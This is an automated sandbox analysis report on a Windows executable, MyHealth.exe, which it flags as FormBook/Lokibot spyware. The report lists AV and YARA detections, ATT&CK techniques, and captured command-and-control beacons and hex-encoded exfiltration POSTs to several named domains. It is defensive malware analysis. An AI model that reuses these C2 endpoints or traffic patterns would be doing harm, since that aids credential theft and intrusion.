Loading ...

Play interactive tourEdit tour

Analysis Report MyHealth.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:216825
Start date:20.03.2020
Start time:14:04:57
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 17m 5s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:MyHealth.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:26
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.troj.spyw.evad.winEXE@21/8@27/10
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 92.2% (good quality ratio 59.9%)
  • Quality average: 52%
  • Quality standard deviation: 41.6%
HCA Information:
  • Successful, ratio: 61%
  • Number of executed functions: 99
  • Number of non-executed functions: 315
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, MusNotifyIcon.exe, svchost.exe, UsoClient.exe
  • Excluded IPs from analysis (whitelisted): 172.217.23.206, 2.18.68.82, 93.184.220.29, 216.58.201.78, 40.90.137.120, 40.90.23.154, 40.90.137.125, 51.124.78.146, 52.158.208.111, 51.105.249.223, 204.79.197.200, 13.107.21.200, 51.104.136.2
  • Excluded domains from analysis (whitelisted): www.bing.com, docs.google.com, umwatson.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, cs9.wac.phicdn.net, lgin.msa.trafficmanager.net, am3p.wns.notify.windows.com.akadns.net, dual-a-0001.a-msedge.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ocsp.digicert.com, a-0001.a-afdentry.net.trafficmanager.net, login.live.com, emea1.notify.windows.com.akadns.net, drive.google.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook Lokibot
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through Module Load1Registry Run Keys / Startup Folder1Process Injection512Masquerading1Credential Dumping1Virtualization/Sandbox Evasion12Remote File Copy3Email Collection1Data Encrypted1Standard Cryptographic Protocol12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaGraphical User Interface1Port MonitorsAccessibility FeaturesSoftware Packing1Network SniffingProcess Discovery2Remote ServicesMan in the Browser1Exfiltration Over Other Network MediumRemote File Copy3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionVirtualization/Sandbox Evasion12Input CaptureSecurity Software Discovery221Windows Remote ManagementData from Local System1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingProcess Injection512Credentials in FilesRemote System Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol15SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessDeobfuscate/Decode Files or Information1Account ManipulationFile and Directory Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information2Brute ForceSystem Information Discovery13Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: MyHealth.exeVirustotal: Detection: 68%Perma Link
Source: MyHealth.exeMetadefender: Detection: 45%Perma Link
Source: MyHealth.exeReversingLabs: Detection: 64%
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.829435156.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1101933517.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000002.1096990085.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 0.2.MyHealth.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 16.0.jj0t1be8.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 14.2.jj0t1be8.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 17.0.jj0t1be8.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 2.0.MyHealth.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 15.2.jj0t1be8.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 14.0.jj0t1be8.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 0.0.MyHealth.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 15.0.jj0t1be8.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1Host: www.factorylegends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1Host: www.frawgboy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=PcDZAYiJMyi1sNPMwoDVqsoC1cthxoAbOhKng71B3qX+ijDUh+XAYLydGv6YiAGIrKQP&GVm=4hedNPC8WB6p HTTP/1.1Host: www.kiheielectricbikes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=K42Ma8CsrX67CksjQH12R0Ttz7K+7j+uYmNE91+lE2r7D1u+oYQSBjHsLCqRW2+VsJ6V&GVm=4hedNPC8WB6p HTTP/1.1Host: www.3365ssr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=GyxwCZ1M+WopjQK5e9tGW3/PGaHjfFVHL5opZNL+ev8OmAkRdzMLOIFVrphwPYji8i11&GVm=4hedNPC8WB6p HTTP/1.1Host: www.sebasview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=vO9Vm2RARflm5p1PFXqn6eBrWTFFnunBf6X3DMkFEdmGbjkCk/pABuPtOpuxvLvCis20&GVm=4hedNPC8WB6p HTTP/1.1Host: www.michalshahar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=sem+50/0YH3mEWESa99Xfx4+r5czIuNqkkKFb8xjbyQB4/frawbs3iCD49k7i6p7/qu6&GVm=4hedNPC8WB6p HTTP/1.1Host: www.nacemo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=chA0yBmUTNqQLPZwVUvzar2BiddoiQLWjuJCjqNw20a2YkZ8Mux+jO9XQqSfhLpE4lVG&GVm=4hedNPC8WB6p HTTP/1.1Host: www.workingtechnologiesmexico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=BsZtdbGEqYRX9CHRV2gAtaO3s0ulgLgaWCJNpi2XP7BrmOUg8feAdzCwhS6+qMEp0P/Y&GVm=4hedNPC8WB6p HTTP/1.1Host: www.factorylegends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?Ttxh=bOZei0djbqQh4s/jjsK6/wovAQFBdVAJChW9V931OnaIZSC2PGiIkIz/okgGLWbQ2jbY&GVm=4hedNPC8WB6p HTTP/1.1Host: www.frawgboy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 204.11.56.48 204.11.56.48
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.frawgboy.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.frawgboy.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frawgboy.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 54 73 56 6b 38 52 38 55 44 4d 64 5f 6a 76 7a 4b 71 6f 44 46 72 67 51 4c 51 41 56 50 66 52 49 33 5a 55 44 50 51 5f 33 59 47 48 6d 76 4a 78 54 70 42 48 54 5f 70 64 36 55 38 58 68 35 45 31 79 5f 33 6a 4b 4c 51 6c 52 4e 37 37 6d 4b 75 65 48 48 36 74 6a 47 71 6c 36 30 39 41 47 57 30 52 57 6b 66 79 47 4d 62 2d 79 6f 6e 66 57 45 45 5a 67 6d 7e 73 31 76 74 50 4b 70 41 6c 6c 2d 49 79 65 61 41 35 45 52 47 4d 61 55 73 73 49 76 37 4b 7a 5a 63 6e 79 54 4c 53 33 36 56 65 67 44 77 78 4b 70 71 52 4e 54 57 75 72 4b 49 69 74 4a 46 46 6c 41 56 47 6b 61 68 4c 44 53 4d 72 6a 49 5a 50 45 34 7a 45 6e 57 69 5f 42 58 56 36 71 39 68 74 63 6d 68 70 45 4a 61 39 79 63 56 61 42 57 76 54 67 42 4b 56 46 79 75 4d 79 42 61 4e 37 79 4e 47 45 65 79 72 79 72 56 64 55 33 6e 44 57 76 35 49 35 68 31 49 50 32 55 4a 49 74 65 4c 36 65 75 61 61 67 58 53 69 54 52 73 73 5a 66 4a 69 41 35 33 77 69 4d 48 44 79 66 70 77 75 39 5f 67 55 67 38 45 79 62 59 54 79 43 4a 63 65 5a 6e 47 5f 58 6b 36 50 78 47 70 54 58 5f 4d 4c 72 66 73 4e 73 38 56 31 4e 30 77 77 76 44 33 78 6d 4b 51 52 5a 4e 77 4c 6c 32 31 66 4f 53 72 30 51 52 62 4f 6a 30 66 61 65 43 53 46 66 68 37 6b 74 65 52 59 57 44 66 5f 57 5a 6f 78 76 74 38 63 33 54 35 76 28 71 32 63 65 31 41 62 48 6f 34 57 36 34 74 51 6c 52 62 4d 76 43 46 61 44 53 78 41 4c 54 79 6f 62 62 45 76 38 31 70 62 4b 43 65 59 35 34 41 32 76 30 72 32 34 61 33 58 4a 52 68 39 6a 45 66 66 55 6c 31 76 4f 30 64 6b 68 37 34 48 68 44 69 2d 46 79 36 6b 48 34 76 6d 42 59 68 4c 57 63 78 68 49 62 67 6c 7a 44 50 77 39 55 30 62 65 42 4b 49 51 52 62 69 4b 37 6c 55 49 35 79 7a 76 4b 69 71 6f 61 51 45 48 70 43 4a 77 79 43 38 7e 68 49 66 44 34 71 41 4a 43 58 4d 37 6f 7e 32 76 2d 67 71 56 6b 42 63 54 64 58 52 74 56 4b 43 71 4a 34 70 7a 54 41 63 35 62 6c 6d 6c 77 38 70 7e 58 78 2d 56 43 4f 34 52 6f 34 38 59 49 71 55 76 37 50 4a 68 50 76 75 34 54 39 6d 6f 2d 46 2d 77 34 34 2d 76 51 54 6f 68 76 39 2d 36 49 47 7a 50 6c 59 66 70 41 6a 63 63 6d 30 37 47 4a 77 4c 42 76 68 5f 32 53 38 44 53 71 50 54 69 66 6e 74 79 39 44 38 74 41 71 42 7a 5f 49 4f 4b 2d 4c 44 4c 48 50 48 43 4d 62 70 35 53 31 44 53 58 45 4b 4b 79 6e 58 59 66 58 4d 58 46 30 6f 50 6a 63 44 66 31 32 52 75 4d 45 6c 6d 78 6f 65 61 42 43 79 42 77 53 52 6d 53 31 32 39 53 6c 47 76 53 46 46 46 47 41 75 46 73 75 4a 75 5a 44 6c 7e 57 7a 30 71 42 57 73 68 4a 78 4e 78 4c 53 4a 71 5a 58 4f 50 35 69 71 6d 4f 37 4d 58 64 4a 55 52 5f 37 52 4a 6c 30 43 54 31 66 51 6b 32 78 30 41 4a 51 30 45 48 6a 49 44 79 4a 55 4c 41 54 61 6a 77 6c 75 54 38 55 46 35 72 58 49 30 6c 63 63 4a 41 55 4b 31 64 5a 6a 74 66 4d 4a 6f 47 6a 70 71 6c 39 6f 72 63 52 59 6f 5
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.kiheielectricbikes.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.kiheielectricbikes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kiheielectricbikes.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 48 2d 50 6a 65 2d 4c 53 54 33 54 50 31 38 66 46 79 63 71 53 6f 6f 4d 62 37 4f 68 79 77 6f 41 43 65 47 48 56 39 59 70 67 6b 34 53 34 74 67 54 53 73 5f 6d 72 54 2d 57 63 52 39 72 53 72 53 69 63 33 4a 56 66 70 4c 62 44 79 39 59 46 32 6a 70 6b 64 47 77 71 66 6e 47 73 6a 74 4a 4a 64 79 50 32 77 4a 54 4a 76 2d 54 79 4b 31 54 70 42 49 4f 38 76 53 54 2d 49 5f 5a 58 30 6c 62 4b 47 4d 4b 4b 58 50 4d 41 70 69 36 39 50 56 4c 49 73 6f 77 56 56 68 4e 73 73 31 47 31 5a 53 68 53 62 57 59 4f 30 50 37 41 6f 6d 4f 68 69 66 66 55 56 73 55 30 48 48 35 54 51 6a 68 69 37 46 37 62 72 32 65 46 7e 4b 28 43 78 30 4d 6c 70 38 31 52 74 4a 66 51 32 78 28 5f 44 52 75 31 50 70 30 38 46 69 77 64 6e 38 46 6e 78 57 79 70 72 31 50 45 6e 75 32 44 67 59 61 4a 6c 68 71 75 71 72 56 47 6e 74 63 50 50 64 33 39 49 72 66 32 50 5f 4f 70 4a 67 37 4e 4a 59 28 44 35 49 72 55 6e 5a 73 4b 4a 31 73 70 39 36 38 75 74 69 64 4b 38 34 50 39 77 53 55 4d 75 4d 51 58 39 6e 78 45 37 31 72 6a 30 42 33 4e 6c 67 63 6b 57 68 4e 44 76 78 67 72 6e 4e 71 71 67 38 49 6e 59 45 61 64 36 31 4d 6f 35 76 47 6d 52 48 4a 75 31 4b 34 45 79 67 6e 65 55 61 6c 6f 57 50 43 67 74 4e 71 4f 36 55 61 75 65 66 39 69 4a 6d 42 4b 37 33 78 77 48 39 4e 65 43 35 63 43 4c 41 64 61 54 38 42 44 58 62 4c 74 67 30 51 6c 69 6a 49 64 65 4f 7a 66 56 74 63 6a 38 62 6e 54 36 54 73 55 63 36 78 69 67 4f 74 4f 4d 39 67 57 62 57 61 6b 6f 6c 46 39 33 36 5a 4f 63 44 44 34 66 30 46 74 39 36 62 64 4e 42 42 69 34 31 68 63 64 6f 67 79 36 7a 72 61 35 43 63 39 4d 6a 46 6c 76 45 46 5a 53 64 5a 41 31 42 64 4d 6f 66 5a 6e 66 39 37 58 74 67 53 67 46 6b 6a 4c 44 70 6e 71 4b 73 75 44 59 30 31 68 65 6e 77 57 50 6f 48 64 47 46 63 42 58 2d 6e 39 43 59 33 62 78 4f 55 7a 4f 39 57 59 66 42 43 47 4a 63 7e 74 7e 73 64 6e 28 59 39 6a 28 77 70 77 48 41 36 4f 31 63 42 36 6c 64 62 57 28 76 65 43 28 59 30 32 6a 39 65 38 66 37 67 52 78 73 63 47 78 42 67 38 66 63 76 6d 6e 4c 28 70 64 44 72 6d 42 6c 44 78 54 62 4a 6b 34 78 45 6b 68 72 61 4a 7a 6c 76 53 43 70 42 4c 4c 55 6b 4c 4b 41 6e 43 74 4c 45 54 48 6e 56 72 51 4e 4c 48 68 6f 57 76 28 32 34 33 54 38 66 74 63 5f 48 61 4c 4c 62 77 6e 6a 6f 4c 72 53 36 36 35 47 48 57 28 65 5a 71 39 59 74 67 6c 71 58 66 48 6e 37 31 70 46 55 4c 78 35 51 4d 44 70 35 34 74 67 32 72 48 39 28 4d 63 52 6c 57 73 34 61 34 63 78 31 6b 61 63 7a 58 32 37 61 70 33 4a 7a 75 52 6a 53 5a 38 39 31 36 50 59 53 33 44 61 4e 31 4f 52 69 43 39 54 48 67 51 48 62 56 45 52 62 48 6d 4c 67 6c 35 63 79 6c 6b 4f 78 4c 61 39 55 75 31 32 53 61 7e 77 35 5f 7a 41 5a 75 57 38 6c 76 61 70 4c 43 75 33 52 6c 64 35 76 53 6c 55 50 78 39 6c 34 7
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 44 6f 55 4e 67 35 7e 45 77 51 53 7a 70 79 75 5f 43 36 65 41 52 79 5a 41 37 4a 28 4e 4c 45 35 45 59 6a 35 66 30 7a 38 4c 63 4c 35 4a 34 4a 6a 4e 71 32 48 4e 45 67 6a 57 68 4f 7e 61 34 47 49 4a 39 62 76 37 41 76 74 6f 77 34 67 46 75 44 6b 69 7a 47 55 64 54 64 58 4a 78 50 35 47 6b 77 62 77 72 77 72 57 7a 77 43 68 79 58 6d 4c 69 41 6f 73 41 63 74 53 6a 33 56 30 34 71 65 5a 39 48 4a 43 44 59 75 50 4e 69 72 52 4a 4a 32 4f 50 74 39 77 69 63 51 47 65 65 70 66 78 56 58 6c 57 58 67 4c 37 70 30 72 39 4e 74 4d 46 38 75 50 39 59 41 37 39 45 53 79 69 54 6a 53 38 78 59 7a 39 47 4e 36 35 44 52 37 48 67 6e 78 50 69 56 73 66 50 42 4c 62 46 4e 68 7e 45 54 34 54 64 32 69 39 4f 37 31 47 4a 30 58 6b 69 5a 31 57 4d 69 79 38 41 61 78 76 6c 4b 6a 51 68 45 79 68 50 70 4b 45 66 56 58 7e 6f 51 59 45 56 41 65 59 61 33 74 4b 42 62 78 51 39 79 54 36 36 6d 58 46 51 41 6d 38 51 31 4c 30 52 36 54 52 67 53 65 45 4e 37 2d 6d 5a 42 33 48 42 34 41 41 45 69 35 4c 51 4d 44 57 7a 52 78 32 4b 36 6b 4b 41 4f 72 57 6e 6f 34 4a 61 73 77 45 6d 4f 67 51 70 39 41 57 5f 54 72 51 5f 31 70 46 35 6f 31 64 79 78 49 6a 48 35 6b 51 33 36 55 6a 6c 70 70 76 47 77 6d 75 5f 7a 54 4a 37 41 42 66 46 34 59 6f 4d 71 35 32 73 28 47 6e 6f 73 49 72 36 7a 34 44 38 63 50 76 59 6a 62 7a 6c 50 44 66 4b 53 6c 78 56 49 56 4f 5a 32 4d 59 33 41 69 4c 55 4b 74 74 32 53 6d 43 33 50 41 4c 30 61 4a 64 71 35 77 6f 53 6b 33 38 68 28 53 36 43 43 70 47 32 35 69 56 42 6b 36 52 78 56 71 49 31 4e 6e 56 43 6f 35 44 77 64 72 61 33 57 4b 58 5a 34 69 6a 65 6c 57 37 38 33 6a 61 68 52 65 73 75 38 78 3
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.3365ssr.comConnection: closeContent-Length: 184662Cache-Control: no-cacheOrigin: http://www.3365ssr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.3365ssr.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 74 78 68 3d 43 61 36 32 45 62 47 67 70 77 76 62 55 44 6f 54 64 42 5a 75 53 54 33 52 31 62 61 4c 7a 51 7e 63 4a 51 68 43 34 57 36 37 42 6d 7a 77 50 68 36 7a 67 39 42 38 54 7a 62 72 5a 44 54 67 65 6e 75 47 35 61 58 6b 6e 38 55 75 61 62 61 71 68 70 52 68 35 47 71 4a 44 46 52 70 6c 77 35 4a 5a 44 4a 65 32 53 53 35 57 4b 54 2d 45 47 59 79 49 38 5a 4d 62 6a 32 68 78 55 34 34 71 46 6d 6b 48 43 74 34 6b 6c 32 63 35 68 62 57 39 65 7a 37 43 5a 33 52 77 76 28 38 31 76 46 61 4e 39 31 71 36 61 4a 46 7a 54 32 62 57 4e 4b 58 5a 4c 6d 5f 57 72 56 4a 51 35 67 48 6f 30 75 63 71 30 78 79 68 65 53 56 38 30 63 47 34 70 6e 66 44 66 7a 74 48 6f 79 4e 79 42 4e 32 34 69 55 5f 53 36 65 39 68 5f 64 46 44 76 77 63 51 72 42 4b 28 49 68 4a 7a 35 69 78 30 46 77 41 4e 50 63 6a 43 58 6f 54 4b 4b 4d 34 6a 4d 6f 4e 5a 72 66 4a 70 71 6e 37 54 59 54 73 63 73 45 79 57 54 4d 54 32 66 4f 6b 6e 45 73 78 46 41 54 35 5a 57 66 71 45 32 4e 72 57 4c 47 6d 71 58 38 55 59 50 5a 58 41 32 35 31 58 54 4e 33 66 63 4a 35 33 45 69 37 46 55 36 4f 51 32 56 43 48 51 56 34 4b 68 66 4c 6c 47 4e 34 39 46 